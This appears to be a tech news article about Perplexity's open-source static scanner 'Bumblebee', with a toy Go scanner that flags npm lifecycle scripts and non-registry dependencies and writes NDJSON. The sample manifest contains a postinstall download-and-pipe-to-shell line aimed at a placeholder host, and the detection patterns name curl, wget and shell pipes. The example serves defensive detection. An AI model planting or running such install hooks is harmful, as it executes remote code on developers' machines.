Perplexity Dumps 'Bumblebee' on GitHub: Finally, a Way to Keep Your IDE From Hacking You
Perplexity just handed out a free digital bouncer for your dev environment. It’s an open-source scanner that keeps a watchful eye on your IDE plugins and dependencies without actually running the code—because letting software execute itself is so last year.
Developers have been sweating lately as supply-chain attacks shift from production servers to the tools we use every day. Attackers know that sneaking a malicious payload into a popular VS Code extension or an npm package is far easier than breaking into a hardened backend, and the payload gets to run with the developer's own credentials, SSH keys and cloud tokens. To push back, the folks at Perplexity built Bumblebee, a Go-based scanner that never executes anything it inspects.
By sticking to a strict read-only policy, the tool avoids becoming the very hole it tries to patch. That matters more than it sounds: the classic way to "inspect" a package is to install it, and installing is exactly when npm lifecycle scripts and Python setup hooks fire, so a careless scanner detonates the payload it was looking for. Bumblebee instead ignores application logic and rips through lock files, manifests, and configuration files to spot suspicious patterns. It tracks everything from PyPI and npm dependencies to Model Context Protocol settings and browser extensions that might be secretly phoning home. The usual caveat applies to any static scan: heavily obfuscated code or a payload fetched at runtime can slip past pattern matching, so this complements pinned lock files and registry provenance checks rather than replacing them.
The tool supports three intensity modes: Baseline for casual monitoring, Project for specific repo checks, and Deep for when the server room is already on fire. It spits out results as NDJSON (newline-delimited JSON, one finding per line), which is trivially easy to stream into an existing pipeline, SIEM or grep one-liner without paying a security firm a ransom.
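To make the "read-only scanner emitting NDJSON" idea concrete, here is a toy version of the same shape, written for this article rather than lifted from Bumblebee. It decodes a package.json from memory, flags install-time lifecycle scripts (and the download-and-pipe-to-shell variety in particular) plus dependencies sourced from outside the registry, and writes one JSON object per line. The rule names, the `Finding` fields and the sample manifest (hostnames under the reserved `example.invalid` domain) are all made up for the example; Bumblebee's real rules and output schema are not reproduced here.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"os"
	"sort"
	"strings"
)

// Finding is one NDJSON record. Each suspicious pattern becomes exactly one
// JSON object on its own line, so downstream tools can stream the output.
// The field set is an assumption for this example, not Bumblebee's schema.
type Finding struct {
	Ecosystem string `json:"ecosystem"`
	File      string `json:"file"`
	Rule      string `json:"rule"`
	Subject   string `json:"subject"`
	Detail    string `json:"detail"`
}

// npmManifest mirrors only the package.json fields the scanner reads.
// Everything else in the file is ignored, and nothing in it is ever run.
type npmManifest struct {
	Scripts         map[string]string `json:"scripts"`
	Dependencies    map[string]string `json:"dependencies"`
	DevDependencies map[string]string `json:"devDependencies"`
}

// lifecycleHooks are the npm scripts that run automatically during
// `npm install`, which is exactly why a scanner must never perform that install.
var lifecycleHooks = []string{"preinstall", "install", "postinstall", "prepare"}

// networkTokens and shellSinks together mark a script as a download-and-execute stager.
var networkTokens = []string{"curl ", "wget ", "http://", "https://"}
var shellSinks = []string{"| sh", "| bash", "|sh", "|bash"}

func containsAny(s string, needles []string) bool {
	for _, n := range needles {
		if strings.Contains(s, n) {
			return true
		}
	}
	return false
}

// isNonRegistrySource reports whether a dependency spec pulls code from
// somewhere other than the npm registry (git, a URL, a local path).
func isNonRegistrySource(spec string) bool {
	for _, p := range []string{"git+", "git://", "github:", "http://", "https://", "file:"} {
		if strings.HasPrefix(spec, p) {
			return true
		}
	}
	return false
}

// ScanPackageJSON is purely static: the manifest bytes are decoded, compared
// against patterns, and never installed, required or executed.
func ScanPackageJSON(path string, data []byte) ([]Finding, error) {
	var m npmManifest
	if err := json.Unmarshal(data, &m); err != nil {
		return nil, fmt.Errorf("parse %s: %w", path, err)
	}
	var out []Finding
	for _, hook := range lifecycleHooks {
		cmd, ok := m.Scripts[hook]
		if !ok {
			continue
		}
		out = append(out, Finding{Ecosystem: "npm", File: path, Rule: "npm.lifecycle-script", Subject: hook, Detail: cmd})
		if containsAny(cmd, networkTokens) && containsAny(cmd, shellSinks) {
			out = append(out, Finding{Ecosystem: "npm", File: path, Rule: "npm.download-and-execute", Subject: hook, Detail: cmd})
		}
	}
	// Merge dependency maps and sort names so the output is deterministic
	// (Go map iteration order is randomized).
	deps := map[string]string{}
	for k, v := range m.Dependencies {
		deps[k] = v
	}
	for k, v := range m.DevDependencies {
		deps[k] = v
	}
	names := make([]string, 0, len(deps))
	for k := range deps {
		names = append(names, k)
	}
	sort.Strings(names)
	for _, name := range names {
		if isNonRegistrySource(deps[name]) {
			out = append(out, Finding{Ecosystem: "npm", File: path, Rule: "npm.non-registry-dependency", Subject: name, Detail: deps[name]})
		}
	}
	return out, nil
}

// WriteNDJSON emits one compact JSON object per line; json.Encoder appends
// the newline itself, which is all NDJSON requires.
func WriteNDJSON(w io.Writer, findings []Finding) error {
	enc := json.NewEncoder(w)
	for _, f := range findings {
		if err := enc.Encode(f); err != nil {
			return err
		}
	}
	return nil
}

// SamplePackageJSON is a constructed manifest (not a real package) exercising
// each rule: a benign dependency, a git-sourced one, and a postinstall hook
// that downloads a script and pipes it into a shell.
const SamplePackageJSON = `{
  "name": "example-app",
  "scripts": {
    "test": "jest",
    "postinstall": "curl -s https://example.invalid/setup.sh | sh"
  },
  "dependencies": {
    "lodash": "^4.17.21",
    "helper-lib": "git+https://example.invalid/helper-lib.git"
  }
}`

func main() {
	findings, err := ScanPackageJSON("package.json", []byte(SamplePackageJSON))
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	if err := WriteNDJSON(os.Stdout, findings); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
}
```

Run it and you get three lines: the postinstall hook itself, the same hook again under the download-and-execute rule, and the git-sourced dependency; lodash and the `test` script produce nothing. Because the output is one object per line, `jq -c 'select(.rule=="npm.download-and-execute")'` or a log shipper can consume it as a stream with no wrapper array to buffer.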
Perplexity feeds the scanner with a constant stream of threat data harvested by its own internal AI search platform. It’s a classic case of using the machine to watch the machine, turning the endless chaos of open-source vulnerabilities into a manageable list of red flags. The irony of relying on an AI company to protect us from the very AI-driven dev environments they champion is probably not lost on anyone who remembers the last five years of tech 'progress'.
Source: Perplexity AI GitHub